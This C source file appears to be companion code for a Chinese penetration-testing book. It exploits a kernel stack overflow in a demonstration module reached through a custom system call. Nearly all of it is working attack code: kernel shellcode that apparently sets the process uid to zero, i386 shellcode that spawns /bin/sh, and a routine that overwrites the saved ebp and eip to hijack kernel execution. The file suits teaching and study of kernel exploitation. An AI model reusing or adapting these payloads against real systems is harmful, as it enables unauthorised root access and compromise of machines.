
📄 kbof_exploit.c

📁 Companion source code for the book "网络渗透技术" (Network Penetration Techniques)
💻 C
/* kbof_exploit.c
*
*  Demonstration program from the book "网络渗透技术" (Network Penetration Techniques)
*  Authors: san, alert7, eyas, watercloud
*
*  Exploit program for kbof.c
*  gcc -o kbof_exploit kbof_exploit.c
*/

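#include <stdio.h>      /* printf */
#include <stdlib.h>     /* exit */
#include <string.h>     /* memset, memcpy */
#include <errno.h>      /* errno, referenced by the _syscall2 macro */
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <unistd.h>
#include <linux/unistd.h>
#include <linux/sysctl.h>
/* system call number under which kbof.c's new_function is reached */
#define __NR_new_function           240
/* generate a user-space stub: int new_function(unsigned int len, char *code) */
static inline _syscall2(int, new_function, unsigned int ,len,char * ,code);
/* filler byte for the unused part of the buffer */
#define NOP 'A'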

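/* payload that runs in kernel mode after the overflow in kbof.c */
char shellcode[]={
//0x0,0x00,0x00,0xff,
//0x50,//push %eax
//0x53,//push %ebx
0xb8,0x2b,0x00,0x00,0x00,//mov $0x2b,%eax  (0x2b: i386 user data segment selector)
0x50,//push %eax
0x50,//push %eax
0x1f,//pop %ds
0x07,//pop %es
0x89,0xe0,//mov %esp,%eax
//next: walk up the stack until a dword equal to 0x23 (i386 user code segment selector) is found
0x83,0xc0,0x04,//add $0x4,%eax
0x8b,0x18,//mov (%eax),%ebx
0x83,0xfb,0x23,//cmp $0x23,%ebx
0x75,0xf6,//jne next

0x83,0xe8,0x04,//sub $0x4,%eax  (step back to the dword just below the match)
0x89,0xc4,//mov %eax,%esp
0x89,0x28,//mov %ebp,(%eax)  (store %ebp in that slot)

0xb8,0x00,0xe0,0xff,0xff, /*mov    $0xffffe000,%eax*/
0x21,0xe0, /*and    %esp,%eax  (round %esp down to an 8 KB boundary)*/
0xc7,0x80,0x28,0x01,0x00,0x00,0x00,0x00,0x00,0x00,/*movl   $0x0,0x128(%eax) */
//0x5b,//pop %ebx
//0x58,//pop %eax
0xcf /* iret */

};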
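/* user-mode shellcode; ends with the string "/bin/sh" */
char shell[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* user-mode function whose address main() writes into the ebp slot */
void test(void)
{
        void (* f)( void );

        /* call the bytes in shell[] as a function */
        f = (void *) shell;
        (* f)();
        exit(0);
}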
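int main(int argc,char **argv)
{
        char code[1024];
        unsigned int len;

        /* fill the buffer with filler bytes, then place the kernel payload at its start */
        memset(code,NOP,1024);
        memcpy(code,shellcode,sizeof(shellcode));

        /* 256 + 8 bytes up to the ebp slot, plus 4 bytes each for the ebp and eip slots */
        len = 256+8+4+4;

        printf("code addr is:%p\n",code);
        *(int *)(code+256+8+4) = (int)code;// eip slot: address of the buffer holding shellcode
        *(int *)(code+256+8) = (int)test;// ebp slot: address of test()
        new_function(len,code);

        return 0;
}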
